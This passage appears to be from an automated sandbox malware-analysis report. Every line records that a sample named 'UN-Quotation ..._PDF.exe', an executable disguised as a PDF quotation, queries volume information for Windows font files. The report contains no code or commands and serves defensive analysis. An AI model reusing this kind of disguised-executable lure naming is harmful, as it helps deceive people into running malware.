                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
